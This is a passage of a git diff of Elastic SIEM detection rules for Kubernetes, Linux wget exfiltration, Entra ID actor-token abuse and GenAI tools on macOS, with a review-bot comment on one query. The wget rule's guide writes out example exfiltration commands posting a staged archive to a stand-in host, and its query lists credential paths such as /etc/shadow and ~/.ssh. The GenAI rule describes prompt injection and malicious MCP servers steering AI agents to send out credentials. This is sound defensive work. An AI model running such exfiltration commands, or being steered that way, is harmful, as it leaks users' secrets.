Validate these integrations and, if deemed safe, include their user agents in the exception list to reduce false positives.\n\n### Response and remediation\n\n- Immediately isolate the affected Kubernetes node or cluster to prevent further unauthorized access or potential lateral movement by the adversary.\n- Review and terminate any suspicious or unauthorized sessions identified in the audit logs to cut off any active malicious activity.\n- Revoke and rotate credentials associated with the compromised user agent to prevent further unauthorized access using the same credentials.\n- Conduct a thorough review of the affected system's configurations and permissions to identify and rectify any misconfigurations or overly permissive access controls.\n- Implement additional monitoring and logging for the affected systems to detect any further anomalies or unauthorized activities promptly.\n- Escalate the incident to the security operations team for a comprehensive investigation and to determine if any data exfiltration or further compromise has occurred.\n- Update and enhance detection rules and alerts to better identify similar anomalies in user agents and response annotations in the future, ensuring quicker response times.\n", - "query": "host.os.type:\"linux\" and event.dataset:\"kubernetes.audit_logs\" and kubernetes.audit.stage:\"ResponseComplete\" and user_agent.original:*\n", - "related_integrations": [ - { - "package": "kubernetes", - "version": "^1.4.1" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": false, - "name": "kubernetes.audit.stage", - "type": "keyword" - }, - { - "ecs": true, - "name": "user_agent.original", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "8a1db198-da6f-4500-b985-7fe2457300af", - "severity": "low", - "tags": [ - "Domain: Kubernetes", - "Domain: Container", - "Use Case: Threat 
Detection", - "Data Source: Kubernetes", - "Tactic: Execution", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 1 - }, - "id": "8a1db198-da6f-4500-b985-7fe2457300af_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/8d8c0b55-ef27-4c20-959f-fa8dd3ac25e6_2.json b/packages/security_detection_engine/kibana/security_rule/8d8c0b55-ef27-4c20-959f-fa8dd3ac25e6_2.json new file mode 100644 index 00000000000..85cd0c210a0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/8d8c0b55-ef27-4c20-959f-fa8dd3ac25e6_2.json 
@@ -0,0 +1,119 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Detects the use of wget to upload files to an internet server. Threat actors often will collect data on a system and attempt to exfiltrate it back to their command and control servers. Use of wget in this way, while not inherently malicious, should be considered highly abnormal and suspicious activity.",
+ "from": "now-9m",
+ "index": [
+ "auditbeat-*",
+ "endgame-*",
+ "logs-auditd_manager.auditd-*",
+ "logs-crowdstrike.fdr*",
+ "logs-endpoint.events.process*",
+ "logs-sentinel_one_cloud_funnel.*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Potential Data Exfiltration Through Wget",
+ "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential Data Exfiltration Through Wget\n\nThis rule flags Linux processes that launch wget with options that upload a local file via HTTP POST, a behavior used to exfiltrate staged data to an external server. Attackers gather files, compress them in /tmp, then execute wget --post-file=/tmp/loot.tar.gz https://example.com/upload from a non-interactive shell or cron job to covertly push the archive out over standard web traffic.\n\n### Possible investigation steps\n\n- Pull the full command line to extract the posted file path, verify the file still exists, capture size/timestamps, and hash its contents to gauge sensitivity and origin.\n- Review the process tree and session context (parent, user, TTY, cron/systemd/container) and correlate with recent logins or scheduler entries to determine whether this was automated or a remote shell action.\n- Enrich the destination endpoint with DNS, WHOIS, certificate, proxy, and egress firewall logs, and check for prior communications from this host to the same domain/IP to assess legitimacy.\n- Pivot 30\u201360 minutes prior on the host/user for staging activity such as tar/gzip in /tmp, bulk file collection, or discovery commands, and interrogate shell history and filesystem events tied to the posted file.\n- If the file was removed post-upload, attempt recovery from EDR or backups and estimate exfil volume and content types via proxy or egress gateway logs to determine impact and drive containment.\n\n### False positive analysis\n\n- A maintenance or monitoring script run via cron posts log archives or configuration snapshots using wget --post-file to an internal HTTP endpoint for routine diagnostics.\n- An administrator or developer testing a web form or API uses wget --body-file to POST a sample file during troubleshooting, producing a benign one-off event.\n\n### Response and remediation\n\n- Immediately isolate the host, terminate the offending wget process, block outbound HTTP(S) to the destination domain/IP seen in the command wget --post-file=/path/to/file https://example.com/upload, and quarantine the posted file path and its parent directory.\n- Identify and disable any cron, systemd, or shell script that invoked wget with --post-file or --body-file (e.g., entries in /etc/cron.d/, user crontabs, or /home/user/.local/bin/upload.sh), delete the script, and revoke the invoking account\u2019s API tokens and SSH keys.\n- Remove staged archives and temp files referenced in the upload (e.g., /tmp/loot.tar.gz and /var/tmp/*.gz), delete companion tooling or collection scripts found alongside them, and reimage the host if system integrity cannot be assured.\n- If the posted content includes credentials, source code, or customer data, rotate affected passwords/keys, invalidate tokens, notify data owners, and restore impacted systems or files from known-good backups.\n- Escalate to incident response and initiate wider containment if the destination domain/IP is not owned by the organization or resolves to an anonymizing/VPS service, if multiple hosts exhibit wget --post-file from non-interactive sessions, or if the uploader executed as root.\n- Harden by enforcing SELinux/AppArmor policies that restrict wget/curl from posting files, requiring egress web proxy allowlists for HTTP POST destinations, adding detections for wget --post-file/--body-file and curl --upload-file/-F, and removing wget from systems where it is unnecessary.\n",
+ "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\", \"start\", \"ProcessRollup2\", \"executed\", \"process_started\") and\nprocess.name == \"wget\" and ?process.parent.executable != null and (\n process.args like (\"--post-file*\", \"--post-data*\", \"--body-file*\") or\n (\n process.command_line like (\"*cat*\", \"*base64*\") and\n process.command_line like (\n \"*/etc/passwd*\", \"*/etc/shadow*\", \"*~/.ssh/*\", \"*.env*\", \"*credentials*\", \"*/tmp/*\",\n \"*/var/tmp/*\", \"*/dev/shm/*\", \"*/home/*/*\", \"*/root/*\"\n )\n )\n) and\n(\n process.command_line like (\"*http:*\", \"*https:*\") or\n process.command_line regex \".*[0-9]{1,3}\\\\.[0-9]{1,3}\\\\.[0-9]{1,3}\\\\.[0-9]{1,3}.*\"\n)\n",
+ "references": [
+ "https://gtfobins.github.io/gtfobins/wget/",
+ "https://cloud.google.com/blog/topics/threat-intelligence/disrupting-gridtide-global-espionage-campaign?hl=en"
+ ],
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ },
+ {
+ "package": "crowdstrike",
+ "version": "^3.0.0"
+ },
+ {
+ "package": "sentinel_one_cloud_funnel",
+ "version": "^1.0.0"
+ },
+ {
+ "package": "auditd_manager",
+ "version": "^1.0.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.command_line",
+ "type": "wildcard"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.executable",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "8d8c0b55-ef27-4c20-959f-fa8dd3ac25e6",
+ "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Exfiltration",
+ "Data Source: Auditd Manager",
+ "Data Source: Elastic Defend",
+ "Data Source: Crowdstrike",
+ "Data Source: SentinelOne",
+ "Data Source: Elastic Endgame",
+ "Resources: Investigation Guide"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0010",
+ "name": "Exfiltration",
+ "reference": "https://attack.mitre.org/tactics/TA0010/"
+ },
+ "technique": [
+ {
+ "id": "T1048",
+ "name": "Exfiltration Over Alternative Protocol",
+ "reference": "https://attack.mitre.org/techniques/T1048/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 2
+ },
+ "id": "8d8c0b55-ef27-4c20-959f-fa8dd3ac25e6_2",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/8e7a4f2c-9b3d-4e5a-a1b6-c2d8f7e9b3a5_2.json b/packages/security_detection_engine/kibana/security_rule/8e7a4f2c-9b3d-4e5a-a1b6-c2d8f7e9b3a5_2.json
deleted file mode 100644
index 4301fd8d5c2..00000000000
--- a/packages/security_detection_engine/kibana/security_rule/8e7a4f2c-9b3d-4e5a-a1b6-c2d8f7e9b3a5_2.json
+++ /dev/null
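Review bot: The second branch of `query` relies on `process.command_line like ("*cat*", "*base64*")`, and `"*cat*"` is an unanchored substring, so a wget command line containing words such as "application", "location" or "certificate" satisfies it; together with the broad path patterns that follow (`"*/tmp/*"`, `"*/home/*/*"`) and the `"*http:*"` clause that almost every wget invocation satisfies, an ordinary download saved under a home directory can trip this branch. Tokenising the pattern, e.g. `process.command_line like ("* cat *", "*base64*") and`, or moving the check onto `process.args`, keeps the intent without that noise; it is also worth confirming which data sources ever populate wget's own argv with `cat`, since a shell expands `$(cat …)` before exec and the rule filters on `process.name == "wget"`. Separately, the `note` value opens with a space before `## Triage and analysis`, unlike the sibling rules in this diff; dropping it keeps the investigation-guide heading consistent. The `setup` text states the rule requires Elastic Defend while `index` and the tags also cover Auditd Manager, CrowdStrike, SentinelOne and Endgame; a sentence saying any one of those feeds is sufficient would avoid misleading operators who run a different source.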
@@ -1,844 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies potential abuse of actor tokens in Microsoft Entra ID audit logs. Actor tokens are undocumented backend mechanisms used by Microsoft for service-to-service (S2S) operations, allowing services to perform actions on behalf of users. These tokens appear in logs with the service's display name but the impersonated user's UPN. While some legitimate Microsoft operations use actor tokens, unexpected usage may indicate exploitation of CVE-2025-55241, which allowed unauthorized access to Azure AD Graph API across tenants before being patched by Microsoft.", - "false_positives": [ - "Creating specific groups via the Exchange Online PowerShell module will make Exchange use an Actor token on your behalf. The rule excludes group operations and directory feature operations to reduce false positives from these legitimate administrative activities." - ], - "from": "now-9m", - "interval": "8m", - "language": "esql", - "license": "Elastic License v2", - "name": "Entra ID Actor Token User Impersonation Abuse", - "note": "## Triage and analysis\n\n### Investigating Entra ID Actor Token User Impersonation Abuse\n\nThis rule detects when Microsoft services use actor tokens to perform operations in audit logs. Actor tokens are undocumented backend mechanisms used by Microsoft for service-to-service (S2S) communication. They appear with a mismatch: the service's display name but the impersonated user's UPN. While some operations legitimately use actor tokens, unexpected usage may indicate exploitation of CVE-2025-55241, which allowed attackers to obtain Global Admin privileges across any Entra ID tenant. 
Note that this vulnerability has been patched by Microsoft as of September 2025.\n\n### Possible investigation steps\n\n- Review the `azure.auditlogs.properties.initiated_by.user.userPrincipalName` field to identify which service principals are exhibiting this behavior.\n- Check the `azure.auditlogs.properties.initiated_by.user.displayName` to confirm these are legitimate Microsoft services.\n- Analyze the actions performed by these service principals - look for privilege escalations, permission grants, or unusual administrative operations.\n- Review the timing and frequency of these events to identify potential attack patterns or automated exploitation.\n- Cross-reference with recent administrative changes or service configurations that might explain legitimate use cases.\n- Check if any new applications or service principals were registered recently that could be related to this activity.\n- Investigate any correlation with other suspicious authentication events or privilege escalation attempts in your tenant.\n\n### False positive analysis\n\n- Legitimate Microsoft service migrations or updates may temporarily exhibit this behavior.\n- Third-party integrations using Microsoft Graph or other APIs might trigger this pattern during normal operations.\n- Automated administrative tools or scripts using service principal authentication could be misconfigured.\n\n### Response and remediation\n\n- Immediately review and audit all service principal permissions and recent consent grants in your Entra ID tenant.\n- Disable or restrict any suspicious service principals exhibiting this behavior until verified.\n- Review and revoke any unnecessary application permissions, especially those with high privileges.\n- Enable and review Entra ID audit logs for any permission grants or role assignments made by these service principals.\n- Implement Conditional Access policies to restrict service principal authentication from unexpected locations or conditions.\n- Enable Entra ID 
Identity Protection to detect and respond to risky service principal behaviors.\n- Review and harden application consent policies to prevent unauthorized service principal registrations.\n- Consider implementing privileged identity management (PIM) for service principal role assignments.\n", - "query": "from logs-azure.auditlogs-* metadata _id, _version, _index\n| where azure.auditlogs.properties.initiated_by.user.displayName in (\n \"Office 365 Exchange Online\",\n \"Skype for Business Online\",\n \"Dataverse\",\n \"Office 365 SharePoint Online\",\n \"Microsoft Dynamics ERP\"\n ) and\n not azure.auditlogs.operation_name like \"*group*\" and\n azure.auditlogs.operation_name != \"Set directory feature on tenant\"\n and azure.auditlogs.properties.initiated_by.user.userPrincipalName rlike \".+@[A-Za-z0-9.]+\\\\.[A-Za-z]{2,}\"\n| keep\n _id,\n @timestamp,\n azure.*,\n client.*,\n event.*,\n source.*\n", - "references": [ - "https://dirkjanm.io/obtaining-global-admin-in-every-entra-id-tenant-with-actor-tokens/", - "https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-55241" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "@timestamp", - "type": "date" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.category", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.identity", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.level", - "type": "double" - }, - { - "ecs": false, - "name": "azure.auditlogs.operation_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.operation_version", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.activity_datetime", - "type": "date" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.activity_display_name", - "type": "keyword" - }, - { - "ecs": false, - "name": 
"azure.auditlogs.properties.additional_details.key", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.additional_details.user_agent", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.additional_details.value", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.authentication_protocol", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.category", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.correlation_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.id", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.initiated_by.app.appId", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.initiated_by.app.displayName", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.initiated_by.app.servicePrincipalId", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.initiated_by.app.servicePrincipalName", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.initiated_by.user.displayName", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.initiated_by.user.id", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.initiated_by.user.ipAddress", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.initiated_by.user.roles", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.initiated_by.user.userPrincipalName", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.logged_by_service", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.operation_type", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.result", - 
"type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.result_reason", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.*.display_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.*.id", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.*.ip_address", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.*.modified_properties.*.display_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.*.modified_properties.*.new_value", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.*.modified_properties.*.old_value", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.*.type", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.*.user_principal_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.0.modified_properties.0.new_value", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.0.modified_properties.0.old_value", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.0.modified_properties.1.display_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.0.modified_properties.1.new_value", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.0.modified_properties.2.new_value", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.0.modified_properties.3.new_value", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.result_description", - 
"type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.result_signature", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.tenant_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.correlation_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.resource.authorization_rule", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.resource.group", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.resource.id", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.resource.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.resource.namespace", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.resource.provider", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.subscription_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.tenant_id", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.address", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.as.number", - "type": "long" - }, - { - "ecs": true, - "name": "client.as.organization.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.bytes", - "type": "long" - }, - { - "ecs": true, - "name": "client.domain", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.geo.city_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.geo.continent_code", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.geo.continent_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.geo.country_iso_code", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.geo.country_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.geo.location", - "type": "geo_point" - }, - { - "ecs": true, - "name": "client.geo.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.geo.postal_code", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.geo.region_iso_code", - "type": 
"keyword" - }, - { - "ecs": true, - "name": "client.geo.region_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.geo.timezone", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.ip", - "type": "ip" - }, - { - "ecs": true, - "name": "client.mac", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.nat.ip", - "type": "ip" - }, - { - "ecs": true, - "name": "client.nat.port", - "type": "long" - }, - { - "ecs": true, - "name": "client.packets", - "type": "long" - }, - { - "ecs": true, - "name": "client.port", - "type": "long" - }, - { - "ecs": true, - "name": "client.registered_domain", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.subdomain", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.top_level_domain", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.user.domain", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.user.email", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.user.full_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.user.group.domain", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.user.group.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.user.group.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.user.hash", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.user.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.user.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "client.user.roles", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.agent_id_status", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.code", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.created", - "type": "date" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - 
}, - { - "ecs": true, - "name": "event.duration", - "type": "long" - }, - { - "ecs": true, - "name": "event.end", - "type": "date" - }, - { - "ecs": true, - "name": "event.hash", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.ingested", - "type": "date" - }, - { - "ecs": true, - "name": "event.kind", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.module", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.original", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.reason", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.reference", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.risk_score", - "type": "float" - }, - { - "ecs": true, - "name": "event.risk_score_norm", - "type": "float" - }, - { - "ecs": true, - "name": "event.sequence", - "type": "long" - }, - { - "ecs": true, - "name": "event.severity", - "type": "long" - }, - { - "ecs": true, - "name": "event.start", - "type": "date" - }, - { - "ecs": true, - "name": "event.timezone", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.url", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.address", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.as.number", - "type": "long" - }, - { - "ecs": true, - "name": "source.as.organization.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.bytes", - "type": "long" - }, - { - "ecs": true, - "name": "source.domain", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.city_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.continent_code", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.continent_name", - "type": "keyword" 
- }, - { - "ecs": true, - "name": "source.geo.country_iso_code", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.country_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.location", - "type": "geo_point" - }, - { - "ecs": true, - "name": "source.geo.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.postal_code", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.region_iso_code", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.region_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.geo.timezone", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.ip", - "type": "ip" - }, - { - "ecs": true, - "name": "source.mac", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.nat.ip", - "type": "ip" - }, - { - "ecs": true, - "name": "source.nat.port", - "type": "long" - }, - { - "ecs": true, - "name": "source.packets", - "type": "long" - }, - { - "ecs": true, - "name": "source.port", - "type": "long" - }, - { - "ecs": true, - "name": "source.registered_domain", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.subdomain", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.top_level_domain", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.user.domain", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.user.email", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.user.full_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.user.group.domain", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.user.group.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.user.group.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.user.hash", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.user.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.user.name", - "type": "keyword" - }, - { - "ecs": true, - 
"name": "source.user.roles", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "8e7a4f2c-9b3d-4e5a-a1b6-c2d8f7e9b3a5", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Entra ID", - "Data Source: Entra Audit Logs", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/", - "subtechnique": [ - { - "id": "T1078.004", - "name": "Cloud Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/004/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0004", - "name": "Privilege Escalation", - "reference": "https://attack.mitre.org/tactics/TA0004/" - }, - "technique": [ - { - "id": "T1548", - "name": "Abuse Elevation Control Mechanism", - "reference": "https://attack.mitre.org/techniques/T1548/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 2 - }, - "id": "8e7a4f2c-9b3d-4e5a-a1b6-c2d8f7e9b3a5_2", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9050506c-df6d-4bdf-bc82-fcad0ef1e8c1_4.json b/packages/security_detection_engine/kibana/security_rule/9050506c-df6d-4bdf-bc82-fcad0ef1e8c1_4.json new file mode 100644 index 00000000000..e0edd4c5e8f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9050506c-df6d-4bdf-bc82-fcad0ef1e8c1_4.json 
@@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects GenAI tools connecting to unusual domains on macOS. Adversaries may compromise GenAI tools through prompt injection, malicious MCP servers, or poisoned plugins to establish C2 channels or exfiltrate sensitive data to attacker-controlled infrastructure. AI agents with network access can be manipulated to beacon to external servers, download malicious payloads, or transmit harvested credentials and documents.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.network*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "GenAI Process Connection to Unusual Domain", + "new_terms_fields": [ + "destination.domain" + ], + "note": "## Triage and analysis\n\n### Investigating GenAI Process Connection to Unusual Domain\n\nGenAI tools with network access can be weaponized to contact attacker infrastructure for C2, data exfiltration, or payload retrieval. Compromised MCP servers, malicious plugins, or prompt injection attacks can redirect AI agents to connect to arbitrary domains. 
While legitimate GenAI tools connect to vendor APIs and CDNs, connections to unusual domains may indicate exploitation.\n\n### Possible investigation steps\n\n- Review the destination domain to determine if it's a legitimate GenAI service, CDN, package registry, or potentially malicious infrastructure.\n- Investigate the GenAI process command line and configuration to identify what triggered the connection (plugin, MCP server, user prompt).\n- Check if the domain was recently registered, uses a suspicious TLD, or has a low reputation score in threat intelligence feeds.\n- Review the timing and context of the connection to determine if it correlates with user activity or was automated.\n- Examine network traffic to and from the domain to identify the nature of the communication (API calls, file downloads, data exfiltration).\n- Check for other hosts in the environment connecting to the same domain to determine if this is an isolated incident.\n- Investigate whether the GenAI tool's configuration files were recently modified to add new MCP servers or plugins.\n- Correlate with file events to see if the GenAI tool downloaded or created files around the same time as the connection.\n\n### False positive analysis\n\n- 